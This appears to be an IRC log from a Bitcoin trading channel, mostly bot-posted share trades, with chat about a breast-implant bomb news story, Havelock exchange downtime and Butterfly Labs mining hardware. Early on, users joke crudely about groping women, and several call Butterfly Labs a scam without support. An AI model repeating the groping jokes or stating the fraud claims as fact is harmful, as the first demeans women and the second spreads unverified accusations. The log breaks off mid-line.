[BTCTC] [LABCOIN] 20 @ 0.001661 = 0.0332 BTC [+] Aug 18 16:08:36 London airports are on “high terror alert” due to fears that women suicide bombers could use surgically inserted explosive breast implants to attack airliners, according to British media reports. Aug 18 16:08:42 FEEL UP ALL THE BIG BOOBS! Aug 18 16:10:01 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.0011 = 0.0055 BTC [-] Aug 18 16:10:03 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.001001 = 0.004 BTC [-] Aug 18 16:13:41 no choice but to cop a feel of all the tits passing by Aug 18 16:14:44 pretty sure this has been entirerly fabricated by perverted "security" agents Aug 18 16:15:49 there also was a news about an attack done with an explosive butt plug, which turned out to be fake Aug 18 16:16:30 [BTCTC] [ASICMINER-PT] 9 @ 3.806 = 34.254 BTC [-] Aug 18 16:16:44 [BTCTC] [ASICMINER-PT] 1 @ 3.854 BTC [+] Aug 18 16:17:12 [BTCTC] [ASICMINER-PT] 5 @ 3.805 = 19.025 BTC [-] Aug 18 16:19:00 [BTCTC] [ASICMINER-PT] 1 @ 3.804 BTC [-] Aug 18 16:19:02 [BTCTC] [ASICMINER-PT] 1 @ 3.803 BTC [-] Aug 18 16:19:04 [BTCTC] [ASICMINER-PT] 1 @ 3.802 BTC [-] Aug 18 16:19:05 [BTCTC] [ASICMINER-PT] 20 @ 3.801 = 76.02 BTC [-] Aug 18 16:19:12 [BTCTC] [ASICMINER-PT] 2 @ 3.8 = 7.6 BTC [-] Aug 18 16:19:28 [BTCTC] [DMS.MINING] 14 @ 0.003298 = 0.0462 BTC [+] Aug 18 16:20:02 [BTCTC] [ASICMINER-PT] 2 @ 3.8 = 7.6 BTC [-] Aug 18 16:20:57 [BTCTC] [ASICMINER-PT] 3 @ 3.8 = 11.4 BTC [-] Aug 18 16:21:00 [BTCTC] [DMS.MINING] 10 @ 0.003298 = 0.033 BTC [+] Aug 18 16:23:06 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.001186 = 0.0047 BTC [+] Aug 18 16:24:54 [BTCTC] [B.YABMC] 10 @ 0.00275 = 0.0275 BTC [+] Aug 18 16:26:28 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.001187 = 0.0071 BTC [+] Aug 18 16:27:11 [HAVELOCK] [AM100] 8 @ 0.037 = 0.296 BTC [-] Aug 18 16:29:12 [HAVELOCK] [AM100] 10 @ 0.0369 = 0.369 BTC [-] Aug 18 16:31:13 [HAVELOCK] [AM100] 10 @ 0.036821 = 0.3682 BTC [-] Aug 18 16:31:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.0382 BTC [+] Aug 18 16:32:46 [BTCTC] [ASICMINER-PT] 10 @ 3.8 = 38 BTC [-] Aug 18 16:33:14 [HAVELOCK] [AM100] 1 @ 0.03682 BTC [-] Aug 18 16:33:17 [BTCTC] [ASICMINER-PT] 4 @ 3.8 = 15.2 BTC [-] Aug 18 16:33:29 [BTCTC] [ASICMINER-PT] 8 @ 3.8 = 30.4 BTC [-] Aug 18 16:33:45 [BTCTC] [BTC-BOND] 2 @ 0.009995 = 0.02 BTC [+] Aug 18 16:33:57 [BTCTC] [ASICMINER-PT] 1 @ 3.8 BTC [-] Aug 18 16:34:16 [BTCTC] [ASICMINER-PT] 1 @ 3.8 BTC [-] Aug 18 16:34:19 [BTCTC] [ASICMINER-PT] 1 @ 3.8 BTC [-] Aug 18 16:34:22 [BTCTC] [ASICMINER-PT] 1 @ 3.8 BTC [-] Aug 18 16:34:24 [BTCTC] [ASICMINER-PT] 1 @ 3.8 BTC [-] Aug 18 16:34:26 [BTCTC] [ASICMINER-PT] 1 @ 3.8 BTC [-] Aug 18 16:34:30 [BTCTC] [ASICMINER-PT] 1 @ 3.8 BTC [-] Aug 18 16:34:31 [BTCTC] [ASICMINER-PT] 1 @ 3.8 BTC [-] Aug 18 16:34:33 [BTCTC] [B.YABMC] 10 @ 0.00275 = 0.0275 BTC [+] Aug 18 16:35:15 [HAVELOCK] [AM100] 3 @ 0.0367 = 0.1101 BTC [-] Aug 18 16:37:44 pankkake i agree. Aug 18 16:38:17 [BTCTC] [TAT.ASICMINER] 20 @ 0.03788 = 0.7576 BTC [-] Aug 18 16:38:18 [BTCTC] [TAT.ASICMINER] 37 @ 0.03788 = 1.4016 BTC [-] Aug 18 16:38:20 [BTCTC] [TAT.ASICMINER] 5 @ 0.03788 = 0.1894 BTC [-] Aug 18 16:38:21 [BTCTC] [TAT.ASICMINER] 7 @ 0.03783 = 0.2648 BTC [-] Aug 18 16:38:23 [BTCTC] [TAT.ASICMINER] 10 @ 0.0378 = 0.378 BTC [-] Aug 18 16:38:41 [HAVELOCK] [AM100] 8 @ 0.037 = 0.296 BTC [+] Aug 18 16:38:43 [BTCTC] [TAT.VIRTUALMINE] 143 @ 0.001187 = 0.1697 BTC [+] Aug 18 16:38:44 [BTCTC] [TAT.VIRTUALMINE] 129 @ 0.001189 = 0.1534 BTC [+] Aug 18 16:38:44 [BTCTC] [TAT.VIRTUALMINE] 123 @ 0.00119 = 0.1464 BTC [+] Aug 18 16:38:46 [BTCTC] [TAT.VIRTUALMINE] 58 @ 0.001191 = 0.0691 BTC [+] Aug 18 16:38:47 [BTCTC] [TAT.VIRTUALMINE] 47 @ 0.001192 = 0.056 BTC [+] Aug 18 16:38:48 [BTCTC] [TAT.VIRTUALMINE] 74 @ 0.001193 = 0.0883 BTC [+] Aug 18 16:38:49 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.001194 = 0.1194 BTC [+] Aug 18 16:38:50 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.001195 = 0.1195 BTC [+] Aug 18 16:38:51 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.001196 = 0.2392 BTC [+] Aug 18 16:38:52 [BTCTC] [TAT.VIRTUALMINE] 249 @ 0.001197 = 0.2981 BTC [+] Aug 18 16:38:53 [BTCTC] [TAT.VIRTUALMINE] 241 @ 0.001197 = 0.2885 BTC [+] Aug 18 16:38:54 [BTCTC] [TAT.VIRTUALMINE] 581 @ 0.001198 = 0.696 BTC [+] Aug 18 16:38:54 [BTCTC] [TAT.VIRTUALMINE] 45 @ 0.001198 = 0.0539 BTC [+] Aug 18 16:40:41 [HAVELOCK] [AM100] 10 @ 0.0369 = 0.369 BTC [-] Aug 18 16:42:41 [HAVELOCK] [AM100] 10 @ 0.036821 = 0.3682 BTC [-] Aug 18 16:44:40 [BTCTC] [BTC-BOND] 8 @ 0.009995 = 0.08 BTC [+] Aug 18 16:44:42 [HAVELOCK] [AM100] 1 @ 0.03682 BTC [-] Aug 18 16:46:11 [BTCTC] [BASIC-MINING] 1 @ 0.3 BTC [+] Aug 18 16:46:21 [BTCTC] [BTC-BOND] 12 @ 0.009996 = 0.12 BTC [+] Aug 18 16:46:43 [HAVELOCK] [AM100] 3 @ 0.0367 = 0.1101 BTC [-] Aug 18 16:47:02 [BTCTC] [RSM] 1 @ 0.0096 BTC [-] Aug 18 16:48:44 [HAVELOCK] [AM100] 1 @ 0.0366 BTC [-] Aug 18 16:50:15 [HAVELOCK] [AM100] 17 @ 0.03651 = 0.6207 BTC [-] Aug 18 16:55:14 [HAVELOCK] [SMG] 1 @ 0.0002539 BTC [-] Aug 18 16:56:33 [BTCTC] [DMS.MINING] 17 @ 0.003298 = 0.0561 BTC [+] Aug 18 16:56:48 [HAVELOCK] [SMG] 1 @ 0.0002539 BTC [-] Aug 18 16:58:29 [HAVELOCK] [AM100] 3 @ 0.03651 = 0.1095 BTC [-] Aug 18 16:58:42 [HAVELOCK] [AM100] 4 @ 0.0365 = 0.146 BTC [-] Aug 18 16:58:43 [HAVELOCK] [AM100] 1 @ 0.0364 BTC [-] Aug 18 16:59:16 [HAVELOCK] [AM100] 2 @ 0.03630001 = 0.0726 BTC [-] Aug 18 16:59:18 [HAVELOCK] [AM100] 20 @ 0.0363 = 0.726 BTC [-] Aug 18 16:59:21 [HAVELOCK] [AM100] 46 @ 0.03620001 = 1.6652 BTC [-] Aug 18 17:00:03 [HAVELOCK] [XBOND] [PAID] 1.00978800 BTC to 2`019`576 shares, 50 satoshi per share Aug 18 17:00:25 http://fotoforensics.com/analysis.php?id=bd0fab37c0ad83601f6ac39f3baeb337a5fa4322.1015333 + http://fotoforensics.com/analysis.php?id=c3a24b647360cc2b7e3197d5a15eb16d5cf758e4.92594 lol guess what. the vmc logo is real and the butterfly on the truck most likely shopped.. =D it wouldn't be a sharp box in the ela picture Aug 18 17:00:29 FotoForensics - Analysis Aug 18 17:01:36 [HAVELOCK] [SMG] 1 @ 0.0002539 BTC [-] Aug 18 17:01:48 ha Aug 18 17:02:00 [BTCTC] [LABCOIN] 20 @ 0.001659 = 0.0332 BTC [-] Aug 18 17:02:02 [BTCTC] [LABCOIN] 45 @ 0.001657 = 0.0746 BTC [-] Aug 18 17:02:03 [BTCTC] [LABCOIN] 60 @ 0.001655 = 0.0993 BTC [-] Aug 18 17:02:29 [BTCTC] [DMS.MINING] 425 @ 0.003299 = 1.4021 BTC [+] Aug 18 17:04:19 [BTCTC] [NASTY-PT] 1 @ 0.00388 BTC [+] Aug 18 17:05:58 [BTCTC] [LABCOIN] 30 @ 0.001656 = 0.0497 BTC [+] Aug 18 17:06:22 [BTCTC] [LABCOIN] 30 @ 0.001656 = 0.0497 BTC [+] Aug 18 17:06:44 [BTCTC] [LABCOIN] 30 @ 0.001656 = 0.0497 BTC [+] Aug 18 17:07:14 [BTCTC] [LABCOIN] 30 @ 0.001656 = 0.0497 BTC [+] Aug 18 17:07:58 [BTCTC] [LABCOIN] 30 @ 0.001657 = 0.0497 BTC [+] Aug 18 17:08:56 [BTCTC] [LABCOIN] 30 @ 0.00168 = 0.0504 BTC [+] Aug 18 17:09:08 [BTCTC] [LABCOIN] 95 @ 0.00168 = 0.1596 BTC [+] Aug 18 17:09:35 [BTCTC] [LABCOIN] 30 @ 0.001658 = 0.0497 BTC [-] Aug 18 17:09:50 [HAVELOCK] [XBOND] 8 @ 0.0010999 = 0.0088 BTC [+] Aug 18 17:12:48 [BTCTC] [LABCOIN] 20 @ 0.001661 = 0.0332 BTC [+] Aug 18 17:20:37 [BTCTC] [LABCOIN] 2000 @ 0.00166 = 3.32 BTC [-] Aug 18 17:20:56 [BTCTC] [LABCOIN] 18 @ 0.001655 = 0.0298 BTC [-] Aug 18 17:23:32 [BTCTC] [DMS.MINING] 3 @ 0.003421 = 0.0103 BTC [+] Aug 18 17:25:09 [BTCTC] [LABCOIN] 40 @ 0.00166 = 0.0664 BTC [+] Aug 18 17:25:36 [BTCTC] [LABCOIN] 5 @ 0.00166 = 0.0083 BTC [+] Aug 18 17:25:49 [BTCTC] [TAT.ASICMINER] 6 @ 0.03732 = 0.2239 BTC [-] Aug 18 17:25:51 [BTCTC] [TAT.ASICMINER] 14 @ 0.03731 = 0.5223 BTC [-] Aug 18 17:27:50 [BTCTC] [DMS.MINING] 1 @ 0.003469 BTC [+] Aug 18 17:28:50 [BTCTC] [DMS.MINING] 500 @ 0.00347 = 1.735 BTC [+] Aug 18 17:29:14 [BTCTC] [DMS.MINING] 105 @ 0.003475 = 0.3649 BTC [+] Aug 18 17:30:15 [BTCTC] [DMS.MINING] 200 @ 0.00348 = 0.696 BTC [+] Aug 18 17:30:48 [BTCTC] [TAT.ASICMINER] 67 @ 0.03793 = 2.5413 BTC [+] Aug 18 17:31:34 [BTCTC] [BASIC-MINING] 4 @ 0.3 = 1.2 BTC [+] Aug 18 17:31:54 [BTCTC] [BASIC-MINING] 1 @ 0.3091 BTC [+] Aug 18 17:31:55 [BTCTC] [BASIC-MINING] 1 @ 0.3091 BTC [+] Aug 18 17:32:25 [BTCTC] [BASIC-MINING] 3 @ 0.3092 = 0.9276 BTC [+] Aug 18 17:32:43 [BTCTC] [B.YABMC] 3 @ 0.00275 = 0.0083 BTC [+] Aug 18 17:32:59 [BTCTC] [B.YABMC] 2 @ 0.0029 = 0.0058 BTC [+] Aug 18 17:33:15 [BTCTC] [B.YABMC] 59 @ 0.00295 = 0.1741 BTC [+] Aug 18 17:33:34 [BTCTC] [B.YABMC] 100 @ 0.003 = 0.3 BTC [+] Aug 18 17:35:45 [BTCTC] [ASICMINER-PT] 1 @ 3.784 BTC [-] Aug 18 17:35:47 [BTCTC] [ASICMINER-PT] 1 @ 3.762 BTC [-] Aug 18 17:35:49 [BTCTC] [ASICMINER-PT] 1 @ 3.761 BTC [-] Aug 18 17:35:50 [BTCTC] [ASICMINER-PT] 1 @ 3.759 BTC [-] Aug 18 17:35:51 [BTCTC] [ASICMINER-PT] 6 @ 3.753 = 22.518 BTC [-] Aug 18 17:35:53 [BTCTC] [ASICMINER-PT] 5 @ 3.752 = 18.76 BTC [-] Aug 18 17:35:59 [BTCTC] [ASICMINER-PT] 1 @ 3.75 BTC [-] Aug 18 17:36:01 [BTCTC] [ASICMINER-PT] 5 @ 3.75 = 18.75 BTC [-] Aug 18 17:36:02 [BTCTC] [ASICMINER-PT] 1 @ 3.75 BTC [-] Aug 18 17:36:03 [BTCTC] [ASICMINER-PT] 1 @ 3.741 BTC [-] Aug 18 17:36:04 [BTCTC] [ASICMINER-PT] 2 @ 3.74 = 7.48 BTC [-] Aug 18 17:36:05 [BTCTC] [ASICMINER-PT] 1 @ 3.731 BTC [-] Aug 18 17:36:38 [BTCTC] [COGNITIVE] 3 @ 0.3909 = 1.1727 BTC [+] Aug 18 17:36:40 [BTCTC] [COGNITIVE] 1 @ 0.3909 BTC [+] Aug 18 17:37:03 [BTCTC] [LABCOIN] 1500 @ 0.00166 = 2.49 BTC [+] Aug 18 17:37:06 [BTCTC] [COGNITIVE] 1 @ 0.391 BTC [+] Aug 18 17:38:26 so what does that image tell us? Aug 18 17:38:47 hardly a scam if eAsic has confirmed there is a relationship Aug 18 17:39:20 ? Aug 18 17:39:44 come on… of course the company exists Aug 18 17:39:57 that's not the issue here Aug 18 17:42:15 https://bitcointalk.org/index.php?topic=135035.msg2957627#msg2957627 Aug 18 17:42:21 Havelock Investments - Exchange feedback/comments Aug 18 17:42:23 ^sorry everyone for the downtime. that post describes what was going on Aug 18 17:44:49 [BTCTC] [DMS.MINING] 2 @ 0.003421 = 0.0068 BTC [-] Aug 18 17:44:51 [BTCTC] [DMS.MINING] 16 @ 0.003299 = 0.0528 BTC [-] Aug 18 17:45:57 i thought assbot did it Aug 18 17:46:10 [BTCTC] [CB.IDIFF-O] 5 @ 0.009749 = 0.0487 BTC [+] Aug 18 17:47:08 [BTCTC] [LABCOIN] 6 @ 0.001664 = 0.01 BTC [+] Aug 18 17:47:23 [BTCTC] [TAT.ASICMINER] 45 @ 0.03727 = 1.6772 BTC [-] Aug 18 17:47:24 [BTCTC] [TAT.ASICMINER] 50 @ 0.03727 = 1.8635 BTC [-] Aug 18 17:47:25 [BTCTC] [TAT.ASICMINER] 5 @ 0.03712 = 0.1856 BTC [-] Aug 18 17:47:27 [BTCTC] [TAT.ASICMINER] 13 @ 0.03711 = 0.4824 BTC [-] Aug 18 17:47:28 [BTCTC] [TAT.ASICMINER] 16 @ 0.0371 = 0.5936 BTC [-] Aug 18 17:47:29 [BTCTC] [TAT.ASICMINER] 11 @ 0.03707 = 0.4078 BTC [-] Aug 18 17:47:31 [BTCTC] [TAT.ASICMINER] 47 @ 0.03706 = 1.7418 BTC [-] Aug 18 17:49:22 [HAVELOCK] [AM100] 1 @ 0.03759995 BTC [+] Aug 18 17:50:17 [BTCTC] [TAT.ASICMINER] 13 @ 0.03711 = 0.4824 BTC [+] Aug 18 17:50:19 [BTCTC] [TAT.ASICMINER] 44 @ 0.0371 = 1.6324 BTC [-] Aug 18 17:52:11 [BTCTC] [TAT.ASICMINER] 23 @ 0.03711 = 0.8535 BTC [+] Aug 18 17:52:12 [BTCTC] [TAT.ASICMINER] 2 @ 0.0371 = 0.0742 BTC [-] Aug 18 17:52:56 [BTCTC] [TAT.ASICMINER] 9 @ 0.0371 = 0.3339 BTC [-] Aug 18 17:53:16 [BTCTC] [TAT.ASICMINER] 4 @ 0.0371 = 0.1484 BTC [-] Aug 18 17:54:32 [HAVELOCK] [SMG] 1 @ 0.000253 BTC [-] Aug 18 17:55:27 kakobrekla, assbot only announces here Aug 18 17:55:31 there's the live feed within the site Aug 18 17:55:36 using the websocket Aug 18 17:55:46 so if you're viewing a page and a trade happens, the price will change instantly Aug 18 17:57:41 [BTCTC] [TAT.ASICMINER] 46 @ 0.03708 = 1.7057 BTC [-] Aug 18 17:57:42 [BTCTC] [TAT.ASICMINER] 3 @ 0.03706 = 0.1112 BTC [-] Aug 18 17:57:44 [BTCTC] [TAT.ASICMINER] 9 @ 0.03705 = 0.3335 BTC [-] Aug 18 17:57:46 [BTCTC] [TAT.ASICMINER] 8 @ 0.03701 = 0.2961 BTC [-] Aug 18 17:57:48 [BTCTC] [TAT.ASICMINER] 12 @ 0.037 = 0.444 BTC [-] Aug 18 17:57:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.037 BTC [-] Aug 18 17:57:57 [BTCTC] [TAT.ASICMINER] 21 @ 0.037 = 0.777 BTC [-] Aug 18 17:58:30 [BTCTC] [ACTIVEMINING] 1 @ 0.005562 BTC [+] Aug 18 17:59:03 i ment haxed havelock but mkay Aug 18 18:02:14 http://bitbet.us/bet/517/bfl-will-deliver-28nm-before-jan-6-2014/ Aug 18 18:02:17 if anyone's bothered. Aug 18 18:02:20 BitBet - BFL will deliver 28nm before Jan 6 2014 Aug 18 18:02:22 omg someone just bought one share of actm!! Aug 18 18:02:32 bored even Aug 18 18:02:58 link in the bet doesnt work Aug 18 18:02:58 https://products.butterflylabs.com/600-gh-bitcoin-mining-card.html Aug 18 18:03:04 Bitcoin Mining Hardware 600 GH Bitcoin Mining Card - Butterfly Labs Aug 18 18:03:16 anyway no gh/w spec :\ Aug 18 18:03:23 in the bet i mean Aug 18 18:03:37 who knows how many times will they change spec Aug 18 18:03:41 600 GH/s nominal performance ( + - 20% ) Aug 18 18:03:41 350w (0.6w/GH conservative estimate) Aug 18 18:03:44 neh ? Aug 18 18:03:54 lol Aug 18 18:03:56 the monarch Aug 18 18:04:07 another bfl scam that will never come to light =/ Aug 18 18:04:42 don't worry, by the time the "haters" manage to wake up the infinite hitpoint crowd a year down the road Aug 18 18:04:51 they'll have yet another "update" to "upgrade" to. Aug 18 18:04:57 like this is the 3rd or w/e. Aug 18 18:05:09 one could argue that bfl has had the opportunity to garner alot of know-how due to their previous mistakes Aug 18 18:05:22 thats what they argue Aug 18 18:05:26 [HAVELOCK] [XBOND] 25 @ 0.001095 = 0.0274 BTC [-] Aug 18 18:05:28 [HAVELOCK] [XBOND] 6 @ 0.00109988 = 0.0066 BTC [+] Aug 18 18:05:31 [HAVELOCK] [XBOND] 24 @ 0.00109989 = 0.0264 BTC [+] Aug 18 18:05:32 If they actually were mistakes, and not just a scam. Aug 18 18:05:33 [HAVELOCK] [XBOND] 514 @ 0.0011 = 0.5654 BTC [+] Aug 18 18:05:35 [HAVELOCK] [XBOND] 31 @ 0.0011 = 0.0341 BTC [+] Aug 18 18:05:52 [HAVELOCK] [XBOND] 269 @ 0.0011 = 0.2959 BTC [+] Aug 18 18:06:12 the shitty part is Aug 18 18:06:21 I would actually buy a card like that Aug 18 18:06:23 if bfl wasnt a scam Aug 18 18:07:07 [BTCTC] [ASICMINER-PT] 1 @ 3.8 BTC [+] Aug 18 18:07:18 [BTCTC] [ASICMINER-PT] 1 @ 3.75 BTC [-] Aug 18 18:07:19 [BTCTC] [ASICMINER-PT] 1 @ 3.731 BTC [-] Aug 18 18:10:16 gecko_x2 so could saddam. Aug 18 18:10:24 problem is, he's dead. so are they. Aug 18 18:11:15 chief among their "previous mistakes", the "mistake" of claiming to burn a batch that wasn't actually proofed to "Save time". Aug 18 18:11:27 no time was saved, but who cares about wasting imaginary money. Aug 18 18:11:37 how about we get a new rule in here Aug 18 18:11:48 talking about bfl gets you a 24h ban Aug 18 18:12:09 we don't do bans. we just laugh at idiots Aug 18 18:12:18 mircea_popescu: Im just tired of hearing it to be honest Aug 18 18:12:25 as they get really butthurt and break out the Idiot Interneteer Psychology Manual Aug 18 18:12:37 [BTCTC] [LABCOIN] 30 @ 0.00168 = 0.0504 BTC [+] Aug 18 18:12:38 [BTCTC] [LABCOIN] 20 @ 0.001681 = 0.0336 BTC [+] Aug 18 18:12:40 [BTCTC] [LABCOIN] 85 @ 0.001683 = 0.1431 BTC [+] Aug 18 18:12:41 [BTCTC] [LABCOIN] 714 @ 0.001686 = 1.2038 BTC [+] Aug 18 18:13:54 [HAVELOCK] [XBOND] 5 @ 0.0011111 = 0.0056 BTC [+] Aug 18 18:14:17 [BTCTC] [ACTIVEMINING] 30 @ 0.005492 = 0.1648 BTC [-] Aug 18 18:14:19 [BTCTC] [ACTIVEMINING] 1060 @ 0.005492 = 5.8215 BTC [-] Aug 18 18:15:09 [BTCTC] [ACTIVEMINING] 8 @ 0.005488 = 0.0439 BTC [-] Aug 18 18:16:08 [BTCTC] [W4A-BOOK] 1 @ 0.25 BTC [-] Aug 18 18:20:10 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1989 BTC [-] Aug 18 18:21:48 [BTCTC] [LABCOIN] 7 @ 0.001681 = 0.0118 BTC [-] Aug 18 18:23:15 [BTCTC] [DMS.MINING] 3 @ 0.00335 = 0.0101 BTC [+] Aug 18 18:23:40 [BTCTC] [DMS.MINING] 4 @ 0.003479 = 0.0139 BTC [+] Aug 18 18:23:52 [BTCTC] [ASICMINER-PT] 1 @ 3.841 BTC [+] Aug 18 18:24:20 [BTCTC] [DMS.MINING] 9 @ 0.00348 = 0.0313 BTC [+] Aug 18 18:24:23 [BTCTC] [ASICMINER-PT] 1 @ 3.842 BTC [+] Aug 18 18:24:24 [BTCTC] [BTC-GROWTH] 3 @ 0.1003 = 0.3009 BTC [-] Aug 18 18:25:04 [BTCTC] [ASICMINER-PT] 1 @ 3.845 BTC [+] Aug 18 18:25:33 [BTCTC] [ASICMINER-PT] 1 @ 3.846 BTC [+] Aug 18 18:30:17 BFL! BFL! BFL! Aug 18 18:30:22 USA! USA! USA! Aug 18 18:30:43 Coca-Cola, sometimes war. Aug 18 18:31:37 maybe BFL_Josh = Anti_Christ Aug 18 18:36:25 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001198 BTC [+] Aug 18 18:38:22 [BTCTC] [DMS.MINING] 9 @ 0.003299 = 0.0297 BTC [-] Aug 18 18:38:43 [BTCTC] [DMS.MINING] 6 @ 0.003298 = 0.0198 BTC [-] Aug 18 18:40:18 " That cooling solution doesn't work for a 350W TDP card. Even a GTX Titan/780 has a great vapor chamber cooler and it's a 250W TDP GPU." Aug 18 18:40:49 [HAVELOCK] [XBOND] 18 @ 0.0011111 = 0.02 BTC [+] Aug 18 18:40:59 [HAVELOCK] [XBOND] 20 @ 0.001175 = 0.0235 BTC [+] Aug 18 18:41:58 [HAVELOCK] [XBOND] 9158 @ 0.001179 = 10.7973 BTC [+] Aug 18 18:47:35 lol Aug 18 18:49:41 [BTCTC] [BTC-GROWTH] 9 @ 0.1003 = 0.9027 BTC [-] Aug 18 18:51:15 [MPEX] [S.MPOE] 1150 @ 0.00083497 = 0.9602 BTC [-] Aug 18 18:53:16 [HAVELOCK] [AM100] 2 @ 0.0378 = 0.0756 BTC [+] Aug 18 18:53:19 [HAVELOCK] [AM100] 1 @ 0.0379 BTC [+] Aug 18 18:56:48 wtf that card is 350w? Aug 18 18:56:54 gecko_x2: btw, vapor chambers arent magic Aug 18 18:57:08 i read that to be "under 350" Aug 18 18:57:25 350w puts it in the realm of a dual gpu card Aug 18 18:57:42 although in a way it doesnt Aug 18 18:57:48 Diablo-D3 just a quote from the forum Aug 18 18:57:49 gpus have all the heat coming out of one or two chips Aug 18 18:57:55 gecko_x2: never listen to the forum Aug 18 18:57:59 its full of fucking morons Aug 18 18:58:03 yes yes Aug 18 18:58:12 its why I dont bother posting there outside of the dmc thread anymore Aug 18 18:58:18 but it isn't like you guys are overwhelmed with other stuff here :p Aug 18 18:58:44 but yeah Aug 18 18:58:54 basically what BFL is not going to do because they're never going to make this is Aug 18 18:59:03 a bunch of little chips all over the board Aug 18 18:59:23 so maybe 4 gpus worth of surface area Aug 18 18:59:24 instead of 2 Aug 18 18:59:40 im sure it's going to be all hotglued in place Aug 18 18:59:42 the reason gpus are such a bitch to cool is because not enough surface area Aug 18 18:59:46 or wait, was that avalon Aug 18 18:59:48 knowing their history, i can't see how bfl would make this delivery date claim unless they were pretty fucking sure it's viable Aug 18 19:00:02 mircea_popescu: no bfl Aug 18 19:00:06 gecko_x2 put quotemarks omg Aug 18 19:00:18 gecko_x2: its viable just stupid Aug 18 19:00:28 bfl has no experience in large scale ee design Aug 18 19:00:31 mircea_popescu damn you're right Aug 18 19:00:34 sry Aug 18 19:00:36 forgot them Aug 18 19:00:50 i usually fail at that. Aug 18 19:01:00 but w/e Aug 18 19:01:07 I dont want to hear about bfl in here anymore Aug 18 19:01:10 take it to a different channel Aug 18 19:01:18 BFL! BFL! BFL!! Aug 18 19:01:51 hey guyse ? i hear licke-jr got his monarch delivered. Aug 18 19:02:27 also bfl and mtgox are going to join forces and create the magnificent, representative, relevant and important Aug 18 19:02:33 BITCOIN DELIVERIES FLOTATION Aug 18 19:02:44 please donate to vessenes for seats on the board. Aug 18 19:03:23 why isn't BFF trading btc denominated shares Aug 18 19:03:28 BFL* Aug 18 19:03:38 because they're not a public company Aug 18 19:03:42 [HAVELOCK] [XBOND] 5 @ 0.00117899 = 0.0059 BTC [-] Aug 18 19:04:01 gecko_x2 originally mpex wouldn't have them, meanwhile i have no idea why. Aug 18 19:04:04 yes Aug 18 19:04:08 but Why Aug 18 19:04:12 oic Aug 18 19:04:15 cause they're a scam ? Aug 18 19:04:16 didn't know that Aug 18 19:04:19 lol Aug 18 19:04:24 but anyway, by now they could easily list on teh scamexchange. Aug 18 19:04:25 well they are shipping something Aug 18 19:04:43 so perhaps you're speaking the future here. Aug 18 19:05:02 well it would be some IPO :p Aug 18 19:05:08 massive speculation Aug 18 19:05:32 indeed. Aug 18 19:07:18 [HAVELOCK] [AM100] 1 @ 0.03688 BTC [-] Aug 18 19:07:20 [HAVELOCK] [AM100] 4 @ 0.0367 = 0.1468 BTC [-] Aug 18 19:13:20 [BTCTC] [DMS.MINING] 11 @ 0.00348 = 0.0383 BTC [+] Aug 18 19:13:53 .d Aug 18 19:13:53 50810339.04828 | Next Diff in 1155 blocks | Estimated Change: 21.6921% in 6d 6h 34m 58s Aug 18 19:19:55 [HAVELOCK] [AM100] 2 @ 0.0381 = 0.0762 BTC [+] Aug 18 19:20:06 [HAVELOCK] [AM100] 1 @ 0.0381999 BTC [+] Aug 18 19:25:39 [BTCTC] [DMS.PURCHASE] 485 @ 0.0207 = 10.0395 BTC [-] Aug 18 19:28:07 [BTCTC] [LABCOIN] 30 @ 0.001685 = 0.0506 BTC [+] Aug 18 19:28:59 [BTCTC] [LABCOIN] 30 @ 0.001685 = 0.0506 BTC [+] Aug 18 19:29:00 [BTCTC] [LABCOIN] 340 @ 0.001686 = 0.5732 BTC [+] Aug 18 19:31:21 [BTCTC] [DMS.MINING] 80 @ 0.00348 = 0.2784 BTC [+] Aug 18 19:42:32 [BTCTC] [DMS.SELLING] 1 @ 0.01781 BTC [-] Aug 18 19:44:19 [BTCTC] [DMS.MINING] 1 @ 0.003301 BTC [-] Aug 18 19:44:37 [BTCTC] [DMS.PURCHASE] 1 @ 0.0207 BTC [-] Aug 18 19:45:53 [BTCTC] [LTC-ATF.B2] 1 @ 0.01043 BTC [+] Aug 18 19:46:08 [BTCTC] [DMS.MINING] 1 @ 0.003479 BTC [+] Aug 18 19:48:44 [HAVELOCK] [AM100] 5 @ 0.0368 = 0.184 BTC [-] Aug 18 19:48:47 [HAVELOCK] [AM100] 4 @ 0.0368 = 0.1472 BTC [-] Aug 18 19:48:48 [HAVELOCK] [AM100] 12 @ 0.0367 = 0.4404 BTC [-] Aug 18 19:48:50 [HAVELOCK] [AM100] 5 @ 0.0366 = 0.183 BTC [-] Aug 18 19:48:53 [HAVELOCK] [AM100] 5 @ 0.03657 = 0.1829 BTC [-] Aug 18 19:48:55 [HAVELOCK] [AM100] 30 @ 0.03656 = 1.0968 BTC [-] Aug 18 19:48:57 [BTCTC] [ACTIVEMINING] 10 @ 0.005407 = 0.0541 BTC [-] Aug 18 19:48:58 [HAVELOCK] [AM100] 1 @ 0.03655 BTC [-] Aug 18 19:49:00 [HAVELOCK] [AM100] 1 @ 0.0365 BTC [-] Aug 18 19:49:02 [HAVELOCK] [AM100] 1 @ 0.0365 BTC [-] Aug 18 19:49:04 [HAVELOCK] [AM100] 10 @ 0.0364 = 0.364 BTC [-] Aug 18 19:49:06 [HAVELOCK] [AM100] 10 @ 0.0363 = 0.363 BTC [-] Aug 18 19:49:08 [HAVELOCK] [AM100] 436 @ 0.03620001 = 15.7832 BTC [-] Aug 18 19:50:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.0374 BTC [+] Aug 18 19:51:11 [BTCTC] [LABCOIN] 10 @ 0.001683 = 0.0168 BTC [-] Aug 18 19:51:31 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.001198 = 0.0024 BTC [+] Aug 18 19:51:43 [BTCTC] [ACTIVEMINING] 10 @ 0.005524 = 0.0552 BTC [+] Aug 18 19:52:49 [HAVELOCK] [AM1] 2 @ 3.99 = 7.98 BTC [+] Aug 18 19:58:32 [BTCTC] [ASICMINER-PT] 2 @ 3.84 = 7.68 BTC [-] Aug 18 19:58:33 [BTCTC] [ASICMINER-PT] 2 @ 3.847 = 7.694 BTC [+] Aug 18 19:58:34 [BTCTC] [ASICMINER-PT] 2 @ 3.87 = 